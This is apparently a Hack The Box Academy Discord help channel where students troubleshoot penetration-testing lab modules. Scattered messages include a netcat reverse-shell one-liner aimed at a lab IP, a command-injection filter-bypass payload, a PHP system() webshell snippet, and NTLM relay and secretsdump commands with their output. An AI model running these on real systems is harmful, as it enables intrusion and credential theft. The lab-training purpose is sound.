Thanks! I'll probably set up my linux (kali ver) fist then 🙂

Does the release of the skill path for android pentesting means there won't be a job role path for it?

because I was excited for an android pentester job role path tbh

Hi, who is doing the ctf?

hi anyone who finished PMKID Attack section of Attacking WPA/WPA2 Wi-Fi Networks i have 1 simple question

@storm elk Pls can you help me with the LLM Output Attacks Skills Assessment ? I am in admin bot and trying to get some SQLi or code injection to work in order to find the flag...

Yes, you can dm me 🙂

Best to also include the module/section/password you're on

hey is it a known issue in the AEN that when we do the ping sweep on DC01 (172.16.9.3)? no host comes back alive for me. I checked the module and there is supposed to be at least one live host so that we try the SSH keys we find in the Department Share directory against that live host.

Best to also include the module/section/password you're on

You may need to ping sweep twice to ensure the ARP tables are populated

ok im trying again. Now how are we supposed to know that we have to run it twice? was this ever mentioned throught the modules?

it worked by the way

Yes it was. It's also networking knowledge that would likely be considered pre-requisite knowledge for hacking/cpts

wow ok thank you

general is fine, maybe #red-team too, but you'll need to verify your account by following the instructions in #welcome before you can access either channel

also im trying to download the ssh keys in evil-winrm but getting download failed. Im thinking its because the space between Departmen Shares: download "C:\Department Shares\IT\Private\Networking\ssmallsadm-id_rsa" /tmp/ssmallsadm-id_rsa

how do i bypass this ?

Try single quotes or just navigate to the directory first and avoid using the download function with the full path

my man!! or woman!!

How do you guys take notes? I’m over here copying almost the documentation for a single nmap flag. It takes make like 1 day to finish a single section of a module bc of the amount notes im taking

I usually note an overview, the command, what the parameters/sytax of the commands do, a screenshot of it working, and any gotchas.

I'm still having trouble with this module. I can make an RDP connection, and in under a minute it crashes. I have tried Remmina instead of xfreerdp3 and nothing has changed. Once RDP crashes, the port is no longer open on the target.

Before RDP crashes:

┌──(kali㉿kali)-[~/HTB/Modules/Sliver]
└─$ nmap 10.129.205.234
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 17:11 EDT
Nmap scan report for 10.129.205.234
Host is up (0.077s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman

After RDP crashes:

┌──(kali㉿kali)-[~/HTB/Modules/Sliver]
└─$ nmap 10.129.205.234
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 17:14 EDT
Nmap scan report for 10.129.205.234
Host is up (0.052s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

I have no other options after this but to restart the target and try again. I'm on my 9th VPN change (both TCP and UDP), I've tried from Pwnbox, the target is not listening on UDP ports so trying RDP over UDP isn't an option. I'm at a loss 🙁

I could really use some help on SQLMap Essentials > Attack Tuning > "What's the contents of table flag5? (Case #5)"
https://academy.hackthebox.com/module/58/section/526

Read the hint and was able to get a flag value, entered in the answer field and it wasn't correct. Ran the command a few times like suggested and got the same thing. Saw it was suggested to restart the target, so I did that. Re-ran my command and now there's no flag at all. Very confused.

Not sure I didn't ping sweep it.

I reset my attack box AND the target once again and finally got the real answer.

In my notes I don't have myself using RDP to access the host, but I'll spin this up in a few and let you know what I do on my end.

Hi everyone, when i use Nmap -sA flag, when do i get a filtered or unfltered port?

Actually after scrolling further through my notes, I got to a point where I checked RDP on the external target and the port wasn't open. I used netexec and the provided creds to enable RDP, verified RDP access with the creds using netexec, then didn't have any issues using RDP to access that host. Have you tried different VPN configs and locations?

Is it possible to reset Modules? Cause i want to pratice some of them again without having the answers

No. Someone did make a github script that hides the answers, but there is no official way of doing it.

ok

Can I get some help please

where you at? do you know how to ask for help here?

<Link to section>
<Section Title>
<Question>

very cool im gonna have to look into this

Module - Navigation- What is the index number of the "sudoers" file in the "/etc" directory? I am connected via open VPN. When I am doing the practice and pulling it up its telling me my answer is incorrect.

the index number... hmm... not sure about that one

Yeah, im stuck in could pass it but I want to know

did you check inodes? is it asking about inodes was that mentioned anywhere in teh section/module?

Ls -i /etc/sudoerers

That gives me the inodes which is the index

When i type that index in then it says the answer is wrong

ok ive never heard it called index before

Yes, im getting annoyed lol

any difference when doing stat /etc/sudoers ?

i think they might mean something else man

It gives the same thing but more detailed

right on

yeah i think they must mean something else then, hard to imagine what though

Its the linux fundamentals module

I doubt they're connected to the spawned target: "Click here to spawn target"

Its a common confusion;
People think "spawn instance" is the target spawn

Intro to academy probably

Its the first module that loads when you create your account, but just like ToS -- people dont read that shit

I figured it out I had the vpn in however I didnt log into the ssh account.

Is there a way to reset my test so I can start over since I figured why things wasn't qorking

No

Oh man

Theres no way to reset the answers

Its a feature thats been suggested though

So how can I figure out the correct answer

? Well if it didnt accept your answer then its not locked out

As far as figuring out the correct answers: utilize the tools at your disposal

Yes, my biggest issue was the most tiny the the ssh lol

Likely a screen resolution thing then, ive never had issues (1280x720)

Actually no. 1920x1080

rock on @minor mica , its the little things (every-single-time)

Yeah could be 2 40 inch wide screen and then 4 20 inch lol

Just need to get back into it.

But tha just you everyone for assisting me

I suggest zooming in on the page (ctrl + [plus key])

No its not that I didnt see it i just thought once im connected to the VPN thats all I needed to do. Lol

Doing the Service Enumeration section under the Network Enumeration with Nmap module and noticed that when I used -oA to write the output to a file, I get less information than if I don't write the output to a file. Specifically, one of the ports discovered shows more info when not writing out. Why could this be?

Using --version-trace adds the "missing" information. Was using --version-all previously

/feedback

Not sure what's missing, tbh, output just puts the output of the scan into a format

After converting the XML to HTML and looking at the reports, can see that Debug level was 0 for "missing" info using --version-all and 1 for --trace (which had the extra info in it)

Guys

So how I find it who did it

Ask Discord or the police. No one here can help you.

I’m doing a lab in which requires me to go to event viewer under the id 4624 8/3/2022 10:23:25 and I have to put my answer in T_W____.exe and don’t know where to find it

hi

Ah, soo it was just about format again... Thanks

getting this error message when ingesting in bloodhound community edition
Using latest bloodhound-ce-python collector
reinstalled bloodhoun ce (so its all clean)
any fixes to resolve this?

True. Admins, is it possible to help us in this matter? (ai red teaming -> attacking AI - application and system -> rogue actions)

Introduction to Process Injection module within Introduction to Windows Evasion Techniques - I am getting this error?

According to the error, a group policy is blocking it

Yeah but its a Windows Antivirus bypass module pretty much, AV isn't detecting it but group policy is stopping it

copied the solution 1:1

. looks like it is to do with this

I don't think that system is domain joined, so it could be referring to the local policy as well. You could run gpresult /h result.html and see if you can find the policy blocking it.

Yeah you have to follow the instructions in the module or it won't work

still need assistance ;v

I think you're trying to import but there's a separate button for upload. You want to upload

theres only one way to upload files in bloodhound community correct me if am wrong

i literally spent the last 2 days redoing my nmap notes just for them to disappear....

oh nvm it's back

Hello, friends. 👋
Remind me, which chat should I write to if I noticed an inaccuracy in the step-by-step solutions, what would be corrected for those who will be passing?
Thank you.

Any modules or resources on HTB for segmentation testing

if so, what are they 🙂

Anyone working on Dante htbpro?

is there any coupon code active for subscriptions?

how i sent screenshots i press the square plus button and its is not working as well as copy-paste

Try to trace through the identifier mentioned in the module

SubjectLogonId

how i upload images here;Please help me

Read and follow #welcome

Hello i stuck in module DACL Attacks II Skill Assessment Tried to connect using chisel on 1st question, but i got connection timeout, i tried troubleshoot but nothing work, any help?

it worked thank you

i am trying to solve (image1) problem i write this (image2) it works but the next command gives an error (image3) in that specific module you do not optain the valid token it is given to you here(image4) Can someone please help me if posible

You need to obtain a new token, using the expired token that was shown in the output will not work

i know but i can not obtain it because it is given to you from here straight up (image)

The response provides with a valid admin token

This is the very first command you run for that section in the module.

hello all

so i just completed the introfuction module

i have 40 cubes can u guys tell em what modules shall i go with?

@long hamlet this is not general chat, please read #rules and follow #welcome

Once again, please any help or advice. I was able to finish all challenges from new Attacking AI module except Rogue Actions. Any advice how to get the flag? Where is it hidden?

I tried but I wasn't able to replicate your results. I used the exact same command.

If you're familiar with ligolo, you could use that instead. Otherwise verify you have the correct port setup in your proxychains configuration file.

I will try with ligolo thank u a lot

This is not the correct channel for this post.

Hi there, is there anyone completed the Nibbles - Initial Foothold section in getting started recently? I'm having problem with php reverse shell as "<?php system('id'); ?>" working perfectly fine but when i upload the reverse shell it is not connecting, i've tried in my onw machine and on attackbox. Also pentestmonkey php reverse shell didin't help either, i would be more thatn happy if someone can help

replace the ip in the revshell part with your own tun0 ip

Hi, did a search on here but didn't find anything definitive on the following;
I am one answer away from finishing the Android Fundamentals course, question:
Find the UID of the application com.android.settings

I will be careful to not give away any answers here, but I have tried multiple methods, each of which yield the same UID, however this is not accepted as an answer. I suspect the UID is legitimately different from the one expected, but not sure how to proceed accordingly

@barren wadi please don't include answers in your screenshots

ouuuu

im sorry but i was doing windows fundementals and i was at the last question in skill assessement and it tells me that this sid is wrong but i dont know why

and i was wondering if anyone knows why did i put it as a wrong group or what?

did you create another object before creating the HR group?

i already did it, getting this warning - WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

what do you mean ?

i went in computer manegment and created a group called hr

between creating the Jim User and Creating the HR security group, did you do something else

no

interesting. because according to that screenshot, you did 😉

try resetting the lab and redoing the steps

okay i will but i dont know why

ill try again thank you

hi folks, is anyone doing the AI Red Teamer Path? I'm stuck at "Vulnerable MCP Servers" if anyone can give me a hint..

Hi guys, I'm stuck on this question. I'm looking for the password for the ldapadmin account somewhere in the system. I'm running this command, but I didn't find the password, or if I did, I got overwhelming information. Any help?
get-ChildItem -Path .*.xml, *.txt, *.config, *.ini, *.cfg -Recurse -Force -hidden | findstr /spin "password" .

Hi guys,
I'm currently working on the module "Active Directory Enumeration & Attacks" and i'm stuck at "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux" exercise 2.
When i try to get the TGS i always get the KRB_AP_ERR_SKEW(Clock skew too great) error...
And since i can't install anything via apt on the attacker machine in this exercise, i really don't know, how to fix this issue...

i did find the flag Using NSE and its scripts to that one of the services contain and did submit the answer but its not correct

check leading and trailing spaces

and check for any missing characters

i did

If you are on the skills assessment and this is Q2, just skip it until you have gotten Q3 & Q4 complete. Then circle back and work on Q2.

Hello i'm stuck on the module "Wi-Fi Penetration Testing Basics - Skills Assessment" especially on the question 2 : crack the password, i tried everything i thought i have to do but it doesn't work, can someone contact me to give me some clues?
Thanks a lot

Need to capture a handshake.

yes that what im trying to do, but i don't know why i don't suceed to get it

i'm doing airodump then a deauth with aireplay but never get a handshake

It shouldn't be super crazy. You can DM what you are trying.

Okay

DM

https://academy.hackthebox.com/module/158/section/1439 can someonee help me with this module?

and can I DM

Ok, i solved this question by using the windows host from the task before...
But that could not be intended...

I tried 9 different VPN locations plus Pwnbox. I'm getting started again this morning, I'll try enabling RDP through netexec and see if it's more stable that way! Thanks 🙂

Wow. If you keep running into issues, you can DM and maybe I can pick up on something in your output.

Thanks! 🙂

Has anyone done the "Active Directory Trust Attacks" module "Attacking Cross Forest Trusts" having issues with kerberoasting

This is from DC01?

correct

Shouldn't be anything crazy. If you haven't already, I'd restart the env and then after it spawns, give it a couple of minutes just in case the env isn't completely spun up or configured.

I did that already. I spent like an hour trying to troubleshoot then i reset the lab and same results

You can DM how you have things setup.

Hello, What host can this user access via WinRM? (just the computer name) - Active Directory Module "Privileged Access" section. I am stuck and I do not really understand why the bloodhound cypher query to look for WinRM access is not working. I cannot figure out which query allows you to view access of a specific user

I've resolved this now. I was expecting the output to be a number. It is not.

If you've identified the user, then you just need to identify the computer name right? If it isn't in BH results, you can likely identify that information using different techniques or tools.

Can't do that using powerview and PowerShell at all for some reason. It errors out when I try different SPNs

You can DM what you are trying.

Finally figure it out. My own fault in missing it.

Thanks 😊

I just booted up that lab to check and that clock skew error on the linux host you're seeing is unintended. Without being able to install rdate or nptdate you can try sudo sntp -s <DC> The command works but I didn't have the clock skew error so I don't know if it actually solves that issue

Cannot follow the text blindly to go rce. You need to write a shell bash. Check HackTheBox “Ophiuchi” to see how it was executed

Thanks
I will try that later 👍

yo guys 2 questions regarding certi.py

the section says we can use certi.py to scan for the web enrollment URL of a CA host that issues the templates

1. how can i do it + are there more straight forward ways ?

2. when trying to do it from the attack host with a socks5 tunnel to the CA host's network, its stuck on DNS request for inlanefreight.local, how can i specify the nameserver for it ?

Hello, is there any specific module designed for regex bypass.

Hellao

Firewall and IDS/IPS Evasion - Medium Lab
Hi everyone, can someone help me with this exercise?

Hey y'all

@slow salmon This is not a hacker for hire server

Allo

Est ce que vous parler en Francais

#rules English only

UDP exists

I'm in the same situation, any luck?

can anyone tell me more about this "With this particular web application, our file went to status.inlanefreight.local\files\demo.aspx" I have never in all my days navigated to a url within my browser using two slashes. I know that this particular host is a windows machine, but its a website? Why am I having to put two slashes like im trying to access a folder on smb or something?

ah the two slashes dont show probably because its a cancellation character here. Imagine there is two slashes after local

it's just how it's set up, that's the most simplified answer I can give

but yes, you are basically accessing a file - try with and without the double slash and you'll see that it isn't an accident

Is there a more in depth short answer? I just kind of want to be able to recognize when I need to be using it and when I shouldn't

there's no absolute way to know, just consider that the double slash is calling a named pipe within the system

REALLY

I haven't dove into that particular subject myself, it's more of a research the tech in use to know

a named pipe

I can tell already that it would be complicated to explain

yes of course, i'm trying every type of Nmap commans but it still doesn't work. Can i write here the command i think to be right?

but it's not that important in the grand scheme of thing

I cant even wrap my head around how you would use a named pipe like that

i recall using a simple sUburbanVehicle scan 😉

#rules this is an ENGLISH only server

what is it?

take a closer look at the characters i capitalized

brother

what are the prereqresuites to intro to penetration tester

can i dm you?

hold on lemme make it more obvious

s __U__burban__V__ehicle 😉

https://tenor.com/view/fizzer1k-5597-3689-move-along-nothing-to-seehere-gif-12353147

I am facing a issue in HTB academy password Attacks module in Attack LSASS section when i try to move the dump file to my attack box using smb share it failed every time could someone help me

try using a different transfer method then

xfreerdp has the /drive: option to mount a share, evil-winrm has the upload/download functionality

Thank you let me try it

thanks i'll try that, i also just ran the agent on the second pivot machine as a job and that seems to have fixed it too! Start-Job in PowerShell

hello

hello everybody, in the Abusing HTTP Misconfigurations module and last section of web cache poisoining"Tools & Prevention" i couldnt find any header that is vulnerable however ı just detect fat get with X-HTTP-Method-Override header and when i poisioned cache it works bu i couldnt find the answer it takes quite long time can someone please give any hints

Hello guys I am new to this so anyone can teach me hacking from basics please

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

WCVS tool is not giving you anything?

Hello everyone, I'm new to the community and new to Hacking, I'm doing the Getting Started path and I'm in the Nibbles - Privilege Escalation section, during the tutorial when we are asked to get a reverse root shell, in the text of the section there is the following example code to get it: [nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh]
The problem is that Nibbles' machine doesn't have a sh command, it has a bash command. I realized this when I accidentally tried to update my TTY with Python 3 and I accidentally put /bin/sh instead of /bin/bash. By doing that change, I was able to get the shell as root. I spent over an hour repeating the tutorial over and over again without knowing why it failed, but it's that small detail, that is, the correct line should be:
[nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh]. Who can be notified to correct this error in the learning tutorial? Because other new HTB Academy students might also be frustrated like me by not knowing what the error was.

Hello beautiful people , seeking for help

Im stuck on this question on my modules :
" How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"

tried to use this command , it looks like the most correct option , and still answer is wrong

ss -l -4 | grep -v 127 | grep “LISTEN” | wc -l

what is wrong , can't figure it out ?

Imo it could be intended. There are many ways to create a reverse shell. Subject to the unique environments of each machine, some may work and others may not. Maybe the author is trying to make you understand that.

Need some help trying to run the Command 'SearchUserClearTextInformation' I keep getting an error that the command is not recognized and I've tried Importing the module and bypassing policy execution. Module is Windows Attacks & Defense: Section: Credentials in Object Properties

If you were able to make a request from Java code, I think you can create a reverse shell from there. I was having trouble executing anything from Java class.

Yes, but with existing exploit unfortunately. But it was my first experience with Metasploit, so not that bad 😀

You resolve it with Metasploit?. Good. Im gonna try do the same.

Please anyone wanna teach me to hack web applications

Just in case, there was a problem with that module, so I created a fix: https://github.com/rapid7/metasploit-framework/pull/20489
It was merged, but I'm not sure if released.

Hello i am needing some help on the linux authentication process module (https://academy.hackthebox.com/module/147/section/1319). i was able to get the passwords with ||jTr|| but i am having trouble with doing so with hashcat. i have tried mutating a list, and i went through the process of unshadowing both files together, however, i just can't get the hashcat process to work. any ideas?

What you guys use for hack the box or CTF? What’s like your go to tool that helps you automate the basics like running nmap ?

nvm figured it out

Please list the module and section you are working on

yes WCVS tool gave me the X-HTTP-Method-Override can be used but response is not that header

I guess you are trying to filter out localhost services? Well, "non 127.0.0.1" doesn't mean it listens on all interfaces.

#1234357888114364508

You should be able to find another header aswell

Question, a lot of the active directory/linux modules in the CPTS path are about exploiting services and software that are 4+ years old, how do you find and learn about more recent vulnerabilities? Are there more recent exploits in higher tier modules?

A lot of the point behind the modules is to teach concepts rather than specifics. It doesn't really matter if the vulnerability is recent or not, as long as you learn the concepts, you can apply them elsewhere as needed

Makes sense, thanks

I tried a lot of things but nothing came diffrent than X-HTTP-Method-Override:POST with GET fat request

Thx

Linux fundamentals
Filters Contents

try this?

netstat -ln4 | grep LISTEN | grep -v 127 | wc -l

This was my first module i did before i started taking notes so i can't really help much. Copy and paste the error code and command into Chatgpt and see if it will help you

Module: Windows Attacks & Defense

Need help with Question 3, I can't seem to get any 4771 logs after I perform the attack.

Hey, would mscoree.dll appear in PSInjection attacks? From my understanding it is more related to BYOL since it works on determining the version of the .NET used to compile the code

nvm got it to work by using runas /user:eagle\bonni cmd.exe

to generate the 4771 log

hello all,

ffuf -w common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v

in this if we add .html at end of FUZZ then will it fuzz like this, admin.html, admin.html.php, admin.html.js

removing .html will FUZZ like this admin.html, admin.php, admin.js etc

Anyone for https://academy.hackthebox.com/module/147/section/3715

Password Hunting Network Traffic

I have the number for Q1 but im not sure it likes the format i've tried the common formats that numbers of this type are commonly displayed in but im still having no luck

nvm it wanted spaces instead of other separators

im a little impressed with myself if anyone wants to give me a pat on the back i recalled how to do all this from memory, yes the queries are easy but i havent used wireshark in over a year and i did "guess from memory" but i was right each time. to me thats more progress than the section itself.

Tell my why i paid 450 usd , and i got hit by “take it slow It seems that you have triggered one of our rate-limiting rules.
Note that crawling and/or scanning any part of the website is not allowed.”
Your IP has been temporarily blocked.

thats prob part of the module, what section are you on? try a stealthier scan

take the nmap module to learn that.

@thorn quarry ^

@minor mica how we doin? still rockin?

For two days or three i didnt log in hackthebox

prob should issue a support ticket about it

Working on Trust Account Attack, but when sshing into the windows machine and running tools, the output gets eaten, tried some term stuff but nothing works. If anyone has any advice on stopping the terminal from eating the output

I ended up enabling RDP on that host and then just used a normal PS session.

That did the trick, appreciate it, better then having to deal with Kerberos double hop from winrm

what is the tier system? like tier iv tier iii etc

i think the academy calls those levels if you're comparing what you get with a subscription/cubes in the description of what Level/Tiers it offers

oh yea but i mean what do tiers even mean? since there is already a difficulty data box?

the tier/level has to do with what you have access to when you're getting a subscription i think

ahh ty ❤️

The tiers relate to overall complexity and depth of knowledge required to be able to complete the module

Its not really to do with subscription level

Hello, I could really use some help with the Password Attacks skills assessment.
Im not really sure how the "don't share details that could spoil anything" works as in what is allowed or not so please let me know. I did the pivot and am trying to connect to the credentials found on the initially given user's home dir but whenever i use proxychains to either run nmap (using the cheatsheet command) or connect through smb, xfreerdp, etc. it never works. Either timing out or taking forever. Any help would be greatly appreciated.

Spoilers include anything you had to dig for, if you search this channel for "password attacks skill assessment" ive posted a general list of hints

I used ligolo-ng for my pivoting

Do You recommend to do blodhound ad module of tier III? In the cpts

nah

May be to reforce aknowledge of blodhound, but may be with the ad module of cpts is enough

Perfect thanks using ligolo worked. Over sock winrm kept failing which is really unfortunate since i was not only using a pwnbox but sock is what the module's cheatsheet said to use. I think it may need to be revised because this was very frustrating to try to figure out when it wasnt related to the content itself.

Hello

is pentest in a nutshell in the cpts path?

pentester job path*

im assuming it has info inside penetrating testing process

You can see all the modules in the path here: https://academy.hackthebox.com/path/preview/penetration-tester

Looks like no

yes im looking now trying to compare the 2

i think pentesting process has the details in there just worded diff

It's in the CJCA path though

yeah thats why im like hmm

because it looks like some foundational info , but maybe pentester has that same foundational info or different

still trying to wrap my head around how my girl has fiber for 50$ and im paying 290 to optimum for 300mbps download

One is a module that gives you an overview. The path is a lot more than that, it's 28 modules as a whole. It teaches you how to network pentest.

ahh okay

makes sense

more in depth

much much more

was trying to pick between the 2 all day but i think pentester is gonna be the move

jcsa im like 43% done because of the fundamentals thats why i considered tbh

wyd supernuts

hi im trying to do password attacks and it requires me to rdp in. but when i rdp in and try to execute 1 command (reg.exe), it just crashes the rdp session

Also currently doing the password attacks assessment and having a very tough time mounting an SMB share. any advice?

Hi nothing else

There are many ways to transfer files if that's what you're trying to do. I like transferring via xfreerdp with the /drive parameter. you could also transfer over a python http server easily. as for smb, you could ask chatgpt for the syntax

well, the main issue is that I can enumerate it all with nxc, but then when I try to mount an SMB share it tells me the password is incorrect

Which doesn't make any sense whatsoever

maybe try wrapping it in single quotes

doesn't work

why are you trying to mount the smb share instead of just using smbclient to access it?

or accessing it from the rdp session itself and copying/moving the file from there

I’m trying to use smbclient, and xfreerdp doesn’t want to copy/paste for some reason. That’s where I’m at. But it constantly tells me I’m using the wrong creds when using smbclient, which is not true.

I’m sorry, I’m just very frustrated with how HTB does things. I am able to use the solutions text for little bumps/nudges but it’s absolutely infuriating when I go through a module, and in classic HTB style, the solution shows to use some random other tool that was never mentioned in the text. The instructions literally say to gain access to the DMZ and then use the cheat sheet for pivoting. so I do that. But, smbclient and proxy chains don’t work well together apparently. So I look in the solution for a bump, and I see this whole essay on using ligolo-ng (spelling may be wrong).

I’m completely understanding of the fact that pentesting isn’t clear cut. 100% get that. But there is some understandable expectations that the learning material and assessments will test on what was actually taught and not simply bring up random tools never previously mentioned.

Again, I’m not meaning that towards anyone. Just super frustrated because I’ve been stuck in this damn assessment for days, and I feel extremely defeated by stupid pieces that really aren’t even the hardest parts (or shouldn’t be, rather).

Like I said, there are many ways. You said you were using nxc, why not just use that to upload/download?

are you using a vm or the pwnbox?

I think because I just assumed nxc was for enumeration only. Using dedicated laptop

wrong password is a pretty straightforward error, could be something else wrong on your end.

so there could be a version difference in tools too. you could see if it works on the pwnbox.

Well, isn’t a wrong password. Turns out I wasn’t using proper domain name (just spied that in the enumeration output)

well there you go, bad authorization

so the creds were wrong

Have you finished this module? Any advice you can provide otherwise?

I haven't gone through the new updated one

Okay.

maybe make sure to take breaks keep that mind fresh would be a tip haha

Okay

Look at the hint Use the command adb shell ls -l /full/path/

Hi, I am in the Command Injections modules in the Advanced Command Obfuscation section, in the Case Manipulation subchapter I am having trouble getting the following to work on the server:

$(a="WhOaMi";printf %s "${a,,}")

Trying something like: (im assuming the % character from %s might be the issue?, tried URL encoding it but doesn't seem to do much)

ip=127.0.0.1%0a$(a="WhOaMi"${LS_COLORS:10:1}printf%09%s%09"${a,,}")

This bypasses the filter but the command isn't executed, my output is:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.024 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.024/0.024/0.024/0.000 ms

~~Any help would be greatly appreciated! ~~

Update: Found the solution

yeah I got it since. It was far easier than I was making it. I was locked into expecting that the numeric representation is what was required and took a bit to get past that.

HTB Academy – SCCM Site Takeover II (Quest 2)
Goal: use the SCCM01$ hash to read \LAB-DC\SCCMShare\SCCMServer01\flag.txt.

Setup: ligolo working; ntlmrelayx -socks targeting 172.50.0.21; ran PetitPotam → got a session only for LAB/SCCM02$@172.50.0.21(445).
Issue: no session for 172.50.0.10 (DC); direct connect over ligolo with
smbclient.py 'LAB/SCCM01$'@172.50.0.10 -hashes ... fails.

Questions:

Should I spin up a second ntlmrelayx against 172.50.0.10 and rerun PetitPotam, or should it work directly via ligolo?

Can you confirm the exact share path is SCCMShare\SCCMServer01 on the DC?

Any tip to reliably force SCCM01$ to authenticate to the relay targeting the DC?

Thanks! 🙏

Hello.

File upload skill assesment:
i can perform xxe to read local file , source code, but i don't found the way to get RCE

send the full error message from ntlmrelayx.py

*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'

• Debug mode: off
  [] (SMB): Received connection from 10.129.230.38, attacking target smb://172.50.0.21
  [] (SMB): Authenticating connection from LAB/SCCM02$@10.129.230.38 against smb://172.50.0.21 SUCCEED
  [] SOCKS: Adding LAB/SCCM02$@172.50.0.21(445) to active SOCKS connection. Enjoy
  [] All targets processed!
  [] (SMB): Connection from 10.129.230.38 controlled, but there are no more targets left!
  [] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [-] SOCKS: No session for LAB/SCCM01$@172.50.0.21(445) available
  [] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
  [-] SOCKS: No session for LAB/SCCM01$@172.50.0.21(445) available
  [-] SOCKS: No session for /LAB\SCCM01$@172.50.0.21(445) available
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [*] SOCKS: Proxying client session for LAB/SCCM02$@172.50.0.21(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)
  [-] SOCKS: Don't have a relay for 172.50.0.10(445)

whats the command you ran for ntlmrelayx.py and smbclient.py?

referring to this

python3 examples/ntlmrelayx.py -t 172.50.0.21 -smb2support -socks --no-http-server

it looks like a syntax problem with -socks, you need to be quite explicit with the username and ip

you can run ntlmrelayx.py with --interactive if you really don't want to deal with that

eh? what are you trying to achieve?

The access to the shares

your ntlmrelayx.py will wrap whatever connection you use with SCCM02$, you can't chain that with the hash of SCCM01$

you should be coercing authentication from SCCM01$ to yourself, then using that connection to access \\LAB-DC\SCCMShare

if i try with SCCM01$ it doesnt work, let me see u the error

This one work: sudo proxychains secretsdump.py 'LAB/SCCM02$'@172.50.0.21 -no-pass
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra

[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.50.0.21:445 ... OK
[] Service RemoteRegistry is in stopped state
[] Starting service RemoteRegistry
[] Target system bootKey: 0x99bae75d092c3b9d979cf712fb4fcfde
[] Dumping local SAM hashes (uid:rid:lmhash:nthash)

But if i try with SCCM01 it doesnt

yeah but your goal isn't to dump SAM on the DC, it's to access the share

I know...so i have to restart the ntlmrelay server for SCCM01 instead SCCM02?

ye

Ty 👍

I tryed but it doesnt work: python3 examples/ntlmrelayx.py -t 172.50.0.10 -smb2support -socks --no-http-server

[-] SOCKS: Don't have a relay for 172.50.0.10(445)

I've been stuck on this for 3 days, trying every possible approach, but nothing seems to work.

Hi, in HTB CBBH - Web Attacks Module - Chaining IDOR Vulnerabilities

With our new role, we may also perform mass assignments to change specific fields for all users, like placing XSS payloads in their profiles or changing their email to an email we specify. Try to write a script that changes all users' email to an email you choose.. You may do so by retrieving their uuids and then sending a PUT request for each with the new email.

I have problem making this scripts, has anyone succeeded in making it?

Never mind, I got it working 🥹

Can i get help with a ctf ?

Module Name: Linux Fundamentals
Section Name: System Information
Question you're struggling with: Connecting with ssh
Generally what you've tried:

1. I checked the connection to the host with a ping command -> I got a response.
2. Connection with ssh to host with -v to see whats going on -> Connection closed

The following is the output as described above:

ping -v -c 4 10.129.40.207
ping: sock4.fd: 3 (socktype: SOCK_DGRAM), sock6.fd: 4 (socktype: SOCK_DGRAM), hints.ai_family: AF_UNSPEC

ai->ai_family: AF_INET, ai->ai_canonname: '10.129.40.207'
PING 10.129.40.207 (10.129.40.207) 56(84) bytes of data.
64 bytes from 10.129.40.207: icmp_seq=1 ttl=63 time=29.1 ms
64 bytes from 10.129.40.207: icmp_seq=2 ttl=63 time=36.3 ms
^C
--- 10.129.40.207 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 29.104/32.720/36.337/3.616 ms

1/2

Are you positive that port 22 is open and accessible?

I need help solving this question form HTB academy

https://academy.hackthebox.com/module/136/section/1291

Its from file upload attacks , I tried upload XSS payload and XXE payloads , it did got successfully uploaded but i dont know how to trigger the uploaded file , Also i dont think the payload is working as there is no output in source code

I did a nmap scan for port 22 and it shows open. And when you look at the ssh debug output you see that there is a connection, but the connection is closed.

I have a solution: ssh -c aes256-ctr htb-student@10.129.40.207
There was a problem with the algorithm. And with the command above another algorithm for encryption is used, that solved the problem.

From the output you can see something related to SCCM01, if you use it to authenticate to the SMB service on the appropriate host, I believe it will work

Hey !

I tried the given payload in the module and updated the file:///flag.txt , it did got uploaded but nothing in source code

thats what im lacking , i cant confirm , all i get is file is uploaded but that can be false positive right ?

can you guide me how can i confirm or trigger the payload ? i dont have file location as well where my file is being uploaded

you can try first with well-known file like /etc/passwd.
After you upload a good payload, you can ge the result by inspecting the web page ( at location where your image is displayed)

okay , thanks for the help im trying to solve it since yesterday. If i get stuck i will DM you

I am doing this section in Sliver C2 module: https://academy.hackthebox.com/module/241/section/2680
